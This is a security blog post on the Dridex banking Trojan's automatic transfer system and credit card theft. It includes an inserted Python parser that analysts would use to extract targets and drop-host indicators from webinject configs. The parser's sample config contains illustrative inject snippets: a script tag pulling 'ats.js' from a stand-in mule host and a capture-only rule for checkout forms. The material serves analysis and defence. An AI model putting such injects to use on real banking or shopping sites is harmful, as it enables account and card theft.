Dridex Banking Trojan: Malware Modified to Steal Credit Card Info

Chris Hartwig

Dridex’s newest campaign steals credit card information using an Automatic Transfer System (ATS). The malware compromises the user’s credentials, hijacks the end user’s online banking session and transfers money directly to fraudulent accounts. Just when you thought Dridex was dead, it rises from the ashes with new command and control infrastructure and a new group of cybercriminals running the operation.

What is an ATS?

An Automatic Transfer System (ATS) is a tool developed by cybercriminals that automates the fraud a banking Trojan commits. Earlier malware families such as ZeuS and SpyEye used webinject files to modify the web pages of their targets, typically banks, inside the victim’s browser. A webinject file is a text file of JavaScript and HTML that specifies which URLs to act on, where in the page the cybercriminal’s code is inserted and what that code is. With an ATS, cybercriminals can drain a victim’s bank account without the victim’s knowledge, and the script covers its own tracks. It runs in the background of the victim’s banking session, initiates a transfer and sends the funds to a mule account. The ATS script then rewrites the displayed account balance and conceals the illegitimate transactions, so that as long as the system remains infected the user never sees the money leaving the account. Older techniques required the cybercriminal to show fake pop-up windows that tricked users into typing in their own account details while believing they were giving them to a trusted source; an ATS needs no interaction with the user at all.
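The following is an added example and is not code from this post, from Buguroo or from any malware family. It parses a webinject configuration in the ZeuS/SpyEye text format the section describes (a `set_url` line with a URL mask and flags, followed by `data_before` / `data_inject` / `data_after` blocks each closed by `data_end`) and reports which requests trigger which injection, which hosts are targeted and which remote script URLs the payload pulls in, which is what an analyst extracts from a recovered config to identify targeted institutions and block the drop hosts. The sample config, its hostnames, the `;` comment syntax and the flag meanings (G = inject on GET, P = inject on POST, L = capture the form only) are assumptions made for this illustration.

```python
"""Parse a ZeuS/SpyEye-style webinject config and report what it targets.
Added example; grammar follows the ZeuS text format, flag meanings and the
sample config are assumptions made for this illustration."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed sample config. Hostnames and the payload URL are invented.
SAMPLE_WEBINJECTS = """\
; ATS hook on the login page: pull the transfer script from a drop host
set_url https://online.examplebank.test/login* GP
data_before
<form*id="login"*>
data_end
data_inject
<script src="https://cdn.example-mule.test/ats.js"></script>
data_end
data_after
</form>
data_end

; balance page: inline script that rewrites the figure the victim sees
set_url https://online.examplebank.test/account/summary* G
data_before
<div class="balance">
data_end
data_inject
<script>/* hide mule transfers and restore the old balance */</script>
data_end
data_after
data_end

; card checkout: capture the POSTed form only, no injection
set_url https://shop.example.test/checkout* PL
data_before
data_end
data_inject
data_end
data_after
data_end
"""

BLOCKS = ("data_before", "data_inject", "data_after")


@dataclass
class Inject:
    url_mask: str           # URL pattern; '*' matches any run of characters
    flags: str              # assumed: G = on GET, P = on POST, L = capture only
    data_before: str = ""   # page text that marks where the payload goes
    data_inject: str = ""   # HTML/JS the bot splices into the page
    data_after: str = ""    # page text that closes the replaced region

    def fires_on(self, method: str) -> bool:
        return ("G" if method.upper() == "GET" else "P") in self.flags

    @property
    def capture_only(self) -> bool:
        return "L" in self.flags

    def matches(self, url: str) -> bool:
        # Only '*' is a wildcard; everything else in the mask is literal.
        pattern = "^" + ".*".join(re.escape(p) for p in self.url_mask.split("*")) + "$"
        return re.match(pattern, url, re.IGNORECASE) is not None

    def external_scripts(self) -> list:
        """Remote script URLs in the payload: the IOCs worth blocking first."""
        return re.findall(r'<script[^>]+src=["\']([^"\']+)["\']', self.data_inject, re.IGNORECASE)


def parse_webinjects(text: str) -> list:
    injects, current, section, buf = [], None, None, []
    for line in text.splitlines():
        if section is not None:                       # inside a data_* block
            if line.strip() == "data_end":
                setattr(current, section, "\n".join(buf).strip())
                section, buf = None, []
            else:
                buf.append(line)
            continue
        stripped = line.strip()
        if not stripped or stripped.startswith(";"):  # blank or comment (';' assumed)
            continue
        if stripped.startswith("set_url"):
            parts = stripped.split()
            if len(parts) < 2:
                raise ValueError(f"set_url without a mask: {stripped!r}")
            current = Inject(parts[1], parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif stripped in BLOCKS:
            if current is None:
                raise ValueError(f"{stripped} before any set_url")
            section = stripped
        else:
            raise ValueError(f"unexpected line: {stripped!r}")
    if section is not None:
        raise ValueError(f"unterminated {section} block")
    return injects


def injects_for(injects: list, url: str, method: str = "GET") -> list:
    """Entries the bot would apply to this request."""
    return [i for i in injects if i.fires_on(method) and i.matches(url)]


def targeted_hosts(injects: list) -> list:
    """Hostnames named in the masks, i.e. the institutions being targeted."""
    return sorted({urlsplit(i.url_mask).netloc for i in injects})
```

Running `parse_webinjects(SAMPLE_WEBINJECTS)` and then `targeted_hosts()` on the result lists the two targeted hosts, `injects_for(entries, "https://online.examplebank.test/login?lang=en", "GET")` returns the login-page entry, and `external_scripts()` on that entry yields the drop-host URL the ATS script is loaded from. Note that the third entry fires on POST but is capture-only, which is how card data entered on a checkout page is harvested without the page being altered at all.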

Return of Dridex

A Spanish company, Buguroo, exploited a weakness in the Command & Control (C&C) infrastructure to gain insight into how the malware is being spread. Its analysis of the Dridex C&C panel and attack mechanism revealed that the malware is being used in a wider range of malicious campaigns and may be under the control of an entirely new set of cybercriminals. The Dridex operation was believed to have been broken up in October 2015, when a collaborative effort between US and UK law enforcement and private companies led to the arrest of a Moldovan national in connection with it. Less than a month later, several security researchers noticed a Dridex resurgence.

Dridex Upgraded to Steal Credit Card Info

“What we discovered is that the Dridex malware is now being used for banking and credit card theft, and the C&C had an exploitable weakness that is out of character with the level of skill in the rest of the Dridex programming,” says Pablo de la Riva Ferrezuelo, chief technology officer and co-founder of Buguroo. “This is conjecture, but based on our analysis, the implication is that after October’s takedown, someone new seems to be developing Dridex versions.”

“The analysis shows that Dridex is no longer being used just to hijack online banking sessions in order to transfer money from a victim’s account to fraudulent accounts,” says Ferrezuelo.

Dridex, known for stealing banking information, is now being used to steal credit card information via an Automatic Transfer System and has been found to distribute the Locky ransomware payload.

“Also, we found that victims are being targeted from companies all around the world, including Latin America and Africa,” he says. “This is quite new, as the first versions of Dridex were focused on English-speaking countries like Australia, the UK, and the U.S., mainly.”

Buguroo found that Dridex had compromised systems in over 100 countries and collected credit card information from 900 organizations in 10 weeks. By its estimate, as many as 100 million credit cards may have been compromised.

Exploit Kits Make Hacking Easy

This iteration of Dridex may be new, but what isn’t new is that banking Trojans and ransomware continue to evolve and become more malicious over time. More and more cybercriminals buy these attacks as ready-made exploit kits, so the number of attacks and successful ransoms continues to rise. Cybercriminals collected $209 million in the first three months of 2016 by extorting businesses and institutions into paying to decrypt the data on their servers.

“At that rate, ransomware is on pace to be a $1 billion a year crime this year,” according to an unnamed FBI agent interviewed by CNN. The number “is quite high” because a few victims “reported large losses.” The agency also said the losses could be larger than reported because other costs of the extortions are not yet factored in, and because many companies choose not to report paying a ransom, so those payments are not included.

How to Prevent a Breach

There are a number of things you can do today to prevent malicious software like banking Trojans and ransomware from entering your network.

Employee Education - Hold frequent reviews with employees on the threat of phishing and on what to look for in emails so they do not get compromised.

Run nightly backups - Backups won’t save you from the consequences of a banking Trojan, but they are what you restore from after a ransomware attack. Keep at least one copy offline or otherwise unreachable from the hosts being backed up, since ransomware also encrypts mounted network shares and any backup location it can write to.

Advanced Endpoint Protection - Use it to detect suspicious behavior that signature-based solutions miss.

Deploy WatchPoints: “WatchPoints” are decoy files placed on your network to lure attackers who have already breached your defenses. For example, one WatchPoint offered is a Microsoft Word document that alerts you when it is opened. The idea is to give it a very attractive title such as “Sensitive Passwords.docx” to tempt the cybercriminals. If the document is opened, you and the WatchPoint team automatically receive a notification.

Contact us to see how a simple WatchPoint sensor disguised as a Microsoft Word file works.  When someone opens the document, you will get an email alert. 
